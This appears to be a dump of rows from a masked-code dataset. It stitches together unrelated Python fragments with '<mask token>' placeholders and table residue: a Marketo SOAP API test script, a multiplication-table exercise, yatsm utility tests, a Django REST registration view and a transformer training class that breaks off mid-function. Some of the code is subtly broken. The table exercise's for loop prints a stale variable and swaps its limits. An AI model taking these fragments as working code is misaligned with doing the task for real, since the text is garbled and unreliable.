lr.ForeignSysPersonId = foreignsyspersonid
lr.ForeignSysType = foreignsystype
if attributes:
lr.leadAttributeList = attributes
return lr
def aLeadRecordArray(leadrecords):
lra = mc.factory.create("ArrayOfLeadRecord")
lra.leadRecord = leadrecords
return lra
# Several things come back with an attribute list that is more pleasant as a dictionary
def attrs2dict(attributelist):
if attributelist is None:
return {}
attributelist = attributelist[0]
d = dict([(attr.attrName,attr.attrValue) for attr in attributelist])
return d
def dict2attrs(d):
al = []
for key, value in d.items():
al.append(anAttribute(attrName=key,attrValue=value))
return anAttributeArray(al)
def test_specification():
compareData("specification", str(mc))
# As of 1.7, these are the methods
# Untested: deleteCustomObjects(xs:string objTypeName, ArrayOfKeyList customObjKeyLists, )
# UnTested: deleteMObjects(ArrayOfMObject mObjectList, )
# Tested: describeMObject(xs:string objectName, )
# Requires having a trigger set for the campaign, from Marketo support:
# Your SOAP request is fine. In order for the getCampaignsForSource call to work,
# you must have a "Campaign is Requested" trigger in the your campaign set to Web Service API.
# Tested: getCampaignsForSource(ReqCampSourceType source, xs:string name, xs:boolean exactName, )
# Untested: getCustomObjects(xs:string objTypeName, xs:string streamPosition, xs:int batchSize, ArrayOfAttribute customObjKeyList, ArrayOfString includeAttributes, )
# Tested: getLead(LeadKey leadKey, )
# Tested: getLeadActivity(LeadKey leadKey, ActivityTypeFilter activityFilter, StreamPosition startPosition, xs:int batchSize, )
# Tested: getLeadChanges(StreamPosition startPosition, ActivityTypeFilter activityFilter, xs:int batchSize, )
# getMObjects(xs:string type, xs:int id, Attrib externalKey, ArrayOfMObjCriteria mObjCriteriaList, ArrayOfMObjAssociation mObjAssociationList, xs:string streamPosition, )
# Tested: getMultipleLeads(xs:dateTime lastUpdatedAt, xs:string streamPosition, xs:int batchSize, ArrayOfString includeAttributes, )
# Tested: listMObjects()
# Tested: listOperation(ListOperationType listOperation, ListKey listKey, ArrayOfLeadKey listMemberList, xs:boolean strict, )
# mergeLeads(ArrayOfAttribute winningLeadKeyList, ArrayOfKeyList losingLeadKeyLists, )
# requestCampaign(ReqCampSourceType source, xs:int campaignId, ArrayOfLeadKey leadList, )
# syncCustomObjects(xs:string objTypeName, ArrayOfCustomObj customObjList, SyncOperationEnum operation, )
# Tested: syncLead(LeadRecord leadRecord, xs:boolean returnLead, xs:string marketoCookie, )
# Untested: syncMObjects(ArrayOfMObject mObjectList, SyncOperationEnum operation, )
# Tested: syncMultipleLeads(ArrayOfLeadRecord leadRecordList, xs:boolean dedupEnabled, )
# Campaign sources
# <xs:enumeration value="MKTOWS"/>
# <xs:enumeration value="SALES"/>
def test_getCampaignsForSource():
print "Testing getCampaignsForSource"
campaigns = mc.service.getCampaignsForSource("MKTOWS",None,False)
resultCount = campaigns.returnCount
campaignrecords = campaigns.campaignRecordList[0]
assert resultCount==len(campaignrecords), "Result count '%s' does not match campaign list '%s'" % (resultCount, len(campaigns))
for campaign in campaignrecords:
print campaign.id, campaign.name, campaign.description
print
def test_getLead():
print "Testing getLead"
leadkey = aLeadKey(email=LEADEMAIL)
lead = mc.service.getLead(leadkey)
assert lead.count == 1
lead = lead.leadRecordList.leadRecord[0]
attrs = attrs2dict(lead.leadAttributeList)
print lead.Id, lead.Email
pprint(attrs)
if SPECIALCODE and SPECIALVALUE:
assert attrs[SPECIALCODE] == SPECIALVALUE
print
# As of 1.7, theses are the activity types
# <xs:enumeration value="VisitWebpage"/>
# <xs:enumeration value="FillOutForm"/>
# <xs:enumeration value="ClickLink"/>
# <xs:enumeration value="RegisterForEvent"/>
# <xs:enumeration value="AttendEvent"/>
# <xs:enumeration value="SendEmail"/>
# <xs:enumeration value="EmailDelivered"/>
# <xs:enumeration value="EmailBounced"/>
# <xs:enumeration value="UnsubscribeEmail"/>
# <xs:enumeration value="OpenEmail"/>
# <xs:enumeration value="ClickEmail"/>
# <xs:enumeration value="NewLead"/>
# <xs:enumeration value="ChangeDataValue"/>
# <xs:enumeration value="LeadAssigned"/>
# <xs:enumeration value="NewSFDCOpprtnty"/>
# <xs:enumeration value="Wait"/>
# <xs:enumeration value="RunSubflow"/>
# <xs:enumeration value="RemoveFromFlow"/>
# <xs:enumeration value="PushLeadToSales"/>
# <xs:enumeration value="CreateTask"/>
# <xs:enumeration value="ConvertLead"/>
# <xs:enumeration value="ChangeScore"/>
# <xs:enumeration value="ChangeOwner"/>
# <xs:enumeration value="AddToList"/>
# <xs:enumeration value="RemoveFromList"/>
# <xs:enumeration value="SFDCActivity"/>
# <xs:enumeration value="EmailBouncedSoft"/>
# <xs:enumeration value="PushLeadUpdatesToSales"/>
# <xs:enumeration value="DeleteLeadFromSales"/>
# <xs:enumeration value="SFDCActivityUpdated"/>
# <xs:enumeration value="SFDCMergeLeads"/>
# <xs:enumeration value="MergeLeads"/>
# <xs:enumeration value="ResolveConflicts"/>
# <xs:enumeration value="AssocWithOpprtntyInSales"/>
# <xs:enumeration value="DissocFromOpprtntyInSales"/>
# <xs:enumeration value="UpdateOpprtntyInSales"/>
# <xs:enumeration value="DeleteLead"/>
# <xs:enumeration value="SendAlert"/>
# <xs:enumeration value="SendSalesEmail"/>
# <xs:enumeration value="OpenSalesEmail"/>
# <xs:enumeration value="ClickSalesEmail"/>
# <xs:enumeration value="AddtoSFDCCampaign"/>
# <xs:enumeration value="RemoveFromSFDCCampaign"/>
# <xs:enumeration value="ChangeStatusInSFDCCampaign"/>
# <xs:enumeration value="ReceiveSalesEmail"/>
# <xs:enumeration value="InterestingMoment"/>
# <xs:enumeration value="RequestCampaign"/>
# <xs:enumeration value="SalesEmailBounced"/>
# <xs:enumeration value="ChangeLeadPartition"/>
# <xs:enumeration value="ChangeRevenueStage"/>
# <xs:enumeration value="ChangeRevenueStageManually"/>
# <xs:enumeration value="ComputeDataValue"/>
# <xs:enumeration value="ChangeStatusInProgression"/>
# <xs:enumeration value="ChangeFieldInProgram"/>
# <xs:enumeration value="EnrichWithJigsaw"/>
def test_getLeadActivity():
print "Testing getLeadActivity"
leadkey = aLeadKey(email=LEADEMAIL)
activities = mc.service.getLeadActivity(leadkey,"")
assert activities.returnCount > 0
activityrecords = activities.activityRecordList[0]
assert len(activityrecords) == activities.returnCount
for activity in activityrecords:
print "Activity", activity.activityDateTime,activity.activityType
attrs = attrs2dict(activity.activityAttributes)
pprint(attrs)
print
def test_requestCampaign():
print "Testing requestCampaign"
campaigns = mc.service.getCampaignsForSource("MKTOWS",None,False)
campaignrecords = campaigns.campaignRecordList[0]
campaignid = None
for campaign in campaignrecords:
if campaign.name == TESTCAMPAIGN:
print "Found", campaign.id, campaign.name, campaign.description
campaignid = campaign.id
break
assert campaignid != None
leadkey = aLeadKey(email=LEADEMAIL)
lead = mc.service.getLead(leadkey)
assert lead.count == 1
lead = lead.leadRecordList.leadRecord[0]
leadid = lead.Id
# Add key appears to want ID
leadkey = aLeadKey(id=leadid)
lka = aLeadKeyArray([leadkey])
result = mc.service.requestCampaign("MKTOWS", campaignid, lka)
assert result.success
print
def test_deleteLeads():
# Depends on a campaign that deletes leads as they ar added
# We also need to know the IDNUM for the contacts
lka = []
for email in TESTEMAILS:
leadkey = aLeadKey(email=email)
lead = mc.service.getLead(leadkey)
assert lead.count == 1
lead = lead.leadRecordList.leadRecord[0]
lka.append(aLeadKey(id=lead.Id))
print "Found lead", lead.Id, lead.Email
lka = aLeadKeyArray(lka)
campaigns = mc.service.getCampaignsForSource("MKTOWS",None,False)
campaignrecords = campaigns.campaignRecordList[0]
campaignid = None
for campaign in campaignrecords:
if campaign.name == DELETECAMPAIGN:
print "Found campaign", campaign.id, campaign.name, campaign.description
campaignid = campaign.id
break
assert campaignid != None
result = mc.service.requestCampaign("MKTOWS", campaignid, lka)
print result
def test_getLeadChanges():
print "Testing getLeadChanges"
since = datetime.datetime(year=2010,month=1, day=1)
changes = mc.service.getLeadChanges("",since,10)
assert changes.returnCount == 10
changerecords = changes.leadChangeRecordList[0]
assert len(changerecords) == changes.returnCount
for change in changerecords:
print "leadChange", change.activityDateTime,change.activityType
pprint(attrs2dict(change.activityAttributes))
print
def test_getMultipleLeads():
print "Testing getMultipleLeads"
lastUpdatedAt = datetime.datetime(year=2010,month=1, day=1)
leads = mc.service.getMultipleLeads(lastUpdatedAt,None,10)
assert leads.returnCount == 10
leadrecords = leads.leadRecordList[0]
assert len(leadrecords) == 10
for lead in leadrecords:
attrs = attrs2dict(lead.leadAttributeList)
print "Lead", lead.Id, lead.Email
pprint(attrs)
print
def test_getMultipleLeadsUnsubscribedFlag():
print "Testing getMultipleLeadsUnsubscribedFlag"
lastUpdatedAt = datetime.datetime(year=2010,month=1, day=1)
attributelist = aStringArray(["Suppressed"])
leads = mc.service.getMultipleLeads(lastUpdatedAt,None,10, attributelist)
assert leads.returnCount == 10
leadrecords = leads.leadRecordList[0]
assert len(leadrecords) == 10
for lead in leadrecords:
attrs = attrs2dict(lead.leadAttributeList)
print "Lead", lead.Id, lead.Email
pprint(attrs)
print
# Valid list operations as of 1.7
# <xs:enumeration value="ADDTOLIST"/>
# <xs:enumeration value="ISMEMBEROFLIST"/>
# <xs:enumeration value="REMOVEFROMLIST"/>
# Valid list types
# <xs:enumeration value="MKTOLISTNAME"/>
# <xs:enumeration value="MKTOSALESUSERID"/>
# <xs:enumeration value="SFDCLEADOWNERID"/>
def test_listOperation():
print "Testing listOperation"
# Require numeric id fields
leadkey = aLeadKey(id=1256) # Is member
leadkey2 = aLeadKey(id=1) # Is not member
result = mc.service.listOperation("ISMEMBEROFLIST",aListKey(LEADLIST),
aLeadKeyArray([leadkey,leadkey2]),True)
print "listOperation", result
def test_syncLead():
print "Testing syncLead"
# This test does a create the first time only.
# The name and email are used in the "standard" marketo API examples
attrs = dict(FirstName="Sam",LastName="Haggy")
leadrecord = aLeadRecord(email="[email protected]",attributes=dict2attrs(attrs))
result = mc.service.syncLead(leadrecord, True, None)
print result.leadId, result.syncStatus.status
def test_syncMultipleLeads():
print "Testing syncMultipleLeads"
leadrecords = []
for email, (firstname,lastname,domain) in zip(TESTEMAILS, TESTNAMES):
leadrecord = aLeadRecord(email=email.lower(), attributes=dict2attrs(dict(FirstName=firstname,LastName=lastname)))
leadrecords.append(leadrecord)
lra = aLeadRecordArray(leadrecords)
print lra
result = mc.service.syncMultipleLeads(lra)
print result
print
def test_listMObjects():
print "Testing listMObjects"
mobjects = mc.service.listMObjects()
compareData("listMObjects", str(mobjects))
print
def test_describeMObject():
print "Testing describeMObject"
mobjects = ["ActivityRecord","LeadRecord","Opportunity","OpportunityPersonRole",]
descriptions = []
for mobject in mobjects:
descriptions.append(str(mc.service.describeMObject(mobject)))
descriptions = "\n".join(descriptions)
compareData("describeMObjects", descriptions)
print
if __name__ == "__main__":
test_data()
test_specification()
test_getLead()
test_getCampaignsForSource()
test_requestCampaign()
test_getLeadActivity()
test_getLeadChanges()
test_listMObjects()
test_describeMObject()
test_getLeadActivity()
test_getMultipleLeads()
test_getMultipleLeadsUnsubscribedFlag()
test_listOperation()
test_syncLead()
test_syncMultipleLeads()
test_deleteLeads()
print "All is well"
| null | null | null | null | [
0
] |
639 | e2c69191d81724cac44bebba3111a773e408b7c8 | <mask token>
| <mask token>
while i <= lowerlimit:
print(i, '*', tablenumber, '=', i * tablenumber)
i = i + 1
print('=======================================================')
<mask token>
for foreachnumber in range(upperlimit, lowerlimit + 1):
print(i, '*', tablenumber, '=', i * tablenumber)
print('=======================================================')
| tablenumber = int(input('Enter a number: '))
upperlimit = int(input('Enter a upper limit: '))
lowerlimit = int(input('Enter a lower limit: '))
i = upperlimit
while i <= lowerlimit:
print(i, '*', tablenumber, '=', i * tablenumber)
i = i + 1
print('=======================================================')
tablenumber = int(input('Enter a number: '))
upperlimit = int(input('Enter a upper limit: '))
lowerlimit = int(input('Enter a lower limit: '))
for foreachnumber in range(upperlimit, lowerlimit + 1):
print(i, '*', tablenumber, '=', i * tablenumber)
print('=======================================================')
| #Print table using while loop
tablenumber = int(input("Enter a number: "))
upperlimit = int(input("Enter a upper limit: "))
lowerlimit = int(input("Enter a lower limit: "))
i = upperlimit
while (i <= lowerlimit):
print (i,"*",tablenumber,"=",i*tablenumber)
i=i+1
print("=======================================================")
#Printing table using for loop
tablenumber = int(input("Enter a number: "))
upperlimit = int(input("Enter a upper limit: "))
lowerlimit = int(input("Enter a lower limit: "))
for foreachnumber in range(upperlimit, lowerlimit+1):
print (i,"*",tablenumber,"=",i*tablenumber)
print("=======================================================")
| null | [
0,
1,
2,
3
] |
640 | a513dfd84b5d9267b7e96fedc88e5b6dabeea19e | <mask token>
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
<mask token>
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
<mask token>
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
@pytest.mark.parametrize(('dtypes', 'ans'), [((np.uint8, np.int16), np.
int16), ((np.uint8, np.uint16, np.int16), np.int32), ((np.uint8, np.
uint16, np.int16, np.float), np.float), ((np.uint8, np.float16, np.
float32, np.float64), np.float64)])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| <mask token>
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(700, 1)])
def test_distribute_jobs_sequential_onejob(nrow, njob):
with pytest.raises(ValueError):
utils.distribute_jobs(nrow, nrow, njob, interlaced=False)
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_succcess_exists(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
@pytest.mark.parametrize(('dtypes', 'ans'), [((np.uint8, np.int16), np.
int16), ((np.uint8, np.uint16, np.int16), np.int32), ((np.uint8, np.
uint16, np.int16, np.float), np.float), ((np.uint8, np.float16, np.
float32, np.float64), np.float64)])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| <mask token>
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_interlaced(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=True))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(700, 1)])
def test_distribute_jobs_sequential_onejob(nrow, njob):
with pytest.raises(ValueError):
utils.distribute_jobs(nrow, nrow, njob, interlaced=False)
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_succcess_exists(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
@pytest.mark.parametrize(('dtypes', 'ans'), [((np.uint8, np.int16), np.
int16), ((np.uint8, np.uint16, np.int16), np.int32), ((np.uint8, np.
uint16, np.int16, np.float), np.float), ((np.uint8, np.float16, np.
float32, np.float64), np.float64)])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| <mask token>
import numpy as np
import pytest
from yatsm import utils
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_interlaced(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=True))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(700, 1)])
def test_distribute_jobs_sequential_onejob(nrow, njob):
with pytest.raises(ValueError):
utils.distribute_jobs(nrow, nrow, njob, interlaced=False)
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_succcess_exists(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
@pytest.mark.parametrize(('dtypes', 'ans'), [((np.uint8, np.int16), np.
int16), ((np.uint8, np.uint16, np.int16), np.int32), ((np.uint8, np.
uint16, np.int16, np.float), np.float), ((np.uint8, np.float16, np.
float32, np.float64), np.float64)])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| """ Tests for `yatsm.utils`
"""
import numpy as np
import pytest
from yatsm import utils
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_interlaced(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=True))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(700, 1)])
def test_distribute_jobs_sequential_onejob(nrow, njob):
with pytest.raises(ValueError):
utils.distribute_jobs(nrow, nrow, njob, interlaced=False)
# mkdir_p
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_succcess_exists(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
# np_promote_all_types
@pytest.mark.parametrize(('dtypes', 'ans'), [
((np.uint8, np.int16), np.int16),
((np.uint8, np.uint16, np.int16), np.int32),
((np.uint8, np.uint16, np.int16, np.float), np.float),
((np.uint8, np.float16, np.float32, np.float64), np.float64),
])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| [
4,
6,
7,
8,
9
] |
641 | 6a5a6bdb0740d51426aa8b36dd3cc317103412b1 | <mask token>
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
| <mask token>
class RegistrationView(APIView):
<mask token>
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
| <mask token>
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
| from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from django.contrib.auth import logout
from rest_framework import status
from rest_framework.authtoken.models import Token
from .serilizer import UserSerializer
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
| from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from django.contrib.auth import logout
from rest_framework import status
from rest_framework.authtoken.models import Token
from .serilizer import UserSerializer
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self,request):
serilizer = UserSerializer(data= request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = { 'response': "user with username " + str(user_name) + ' created'}
data['key'] = get_object_or_404(Token,user = account).key
return Response( data ,status = status.HTTP_201_CREATED )
else :
return Response(serilizer.errors,status = status.HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self,request):
logout(request)
return Response({"response" : "logged out"},status=status.HTTP_200_OK) | [
2,
4,
5,
6,
7
] |
642 | 04aacf9461ade2e229076ffdf85aca913037edad | <mask token>
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self, dataset_reader: NavigationDatasetReader, encoder:
TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:
Scheduler, num_epochs: int, num_blocks: int, device: torch.device,
checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,
resolution: int=64, patch_size: int=8, block_size: int=4,
batch_size: int=16, output_type: str='per-pixel', checkpoint_every:
int=64, validation_limit: int=16, depth: int=7, score_type: str=
'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,
debug_image_top_k: int=None, debug_image_threshold: float=None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[], encoder=encoder, optimizer=optimizer, scheduler=
scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device
=device, checkpoint_dir=checkpoint_dir, num_models_to_keep=
num_models_to_keep, generate_after_n=generate_after_n,
score_type=score_type, patch_size=patch_size, block_size=
block_size, output_type=output_type, resolution=resolution,
depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=
zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
if debug_image_top_k < 0:
debug_image_top_k = None
if debug_image_threshold < 0:
debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i + self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f'Validating epoch {epoch} step {step}...')
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read(
'dev', validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, epoch, b, 0)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.
read('dev', self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.
debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f'Test-time pixel acc {mean_acc * 100}')
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f'Training epoch {epoch}...')
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read('train')):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.
next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step + 1)
self.scheduler.step_batch(it)
if (step + 1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.
validation_limit)
print(
f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'
)
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f'{epoch}_{step}', is_best)
step += 1
print(f'skipped {skipped} examples')
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.
validation_limit)
print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')
if self.score_type == 'acc':
return epoch_acc / 2, -1.0
else:
raise AssertionError(f'invalid score type {self.score_type}')
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,
1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs['next_position']
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,
next_patches)
total_loss = next_pixel_loss
print(f'loss {total_loss.item()}')
return total_loss
def generate_debugging_image(self, true_img, path_state, pred_path,
out_path, caption=None, top_k=None, threshold=None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2, 2, figsize=(16, 16))
text_ax = ax[0, 1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize=12)
text_ax.axis('off')
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
img_ax = ax[1, 0]
true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(
float)
true_ax = ax[0, 0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1, :, :]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path < 1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)
pred_ax = ax[1, 1]
pred_ax.imshow(pred_path)
file_path = f'{out_path}.png'
print(f'saving to {file_path}')
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num,
top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size,
output_type='per-patch', upsample=True)
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[
'path_state'].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs['next_position'].shape[0]):
output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'
).joinpath(f'instance_{i}')
output_path.mkdir(parents=True, exist_ok=True)
command = batch_instance['command'][i]
command = [x for x in command if x != '<PAD>']
command = ' '.join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance['path_state'][i]
pred_path = next_position[i]
self.generate_debugging_image(image, path_state, pred_path,
output_path, caption=command, top_k=top_k, threshold=
threshold)
return {'next_f1': next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-08
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()
